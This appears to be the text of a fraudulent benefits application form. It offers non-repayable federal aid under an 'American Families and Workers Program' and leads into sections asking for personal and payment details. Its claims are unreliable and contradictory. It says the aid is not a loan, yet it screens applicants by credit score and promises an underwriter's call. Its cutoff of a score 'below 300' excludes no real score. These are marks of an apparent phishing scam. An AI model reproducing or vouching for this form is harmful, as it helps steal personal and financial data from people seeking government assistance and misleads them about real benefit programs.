Assistance Application Form

To apply for financial assistance under the American Families and Workers Program, you must be at least 18 years of age. This assistance is not a loan and does not require repayment. The amount of assistance you may receive is determined by the type of assistance selected, which includes Economic Impact Payments, Unemployment Compensation, Child Tax Credit, or Emergency Rental Assistance. Funds will be disbursed via Direct Deposit or Debit Card.

Eligibility is determined based on your credit score. Applicants with a credit score below 300 will not qualify, while those with a score between 300 and 850 have a greater probability of approval. You will receive an email notification regarding your application status, and if approved, we will proceed with the disbursement of funds.

An underwriter will contact you within 24 hours of approval to guide you through the next steps.

Personal Information

Payment Information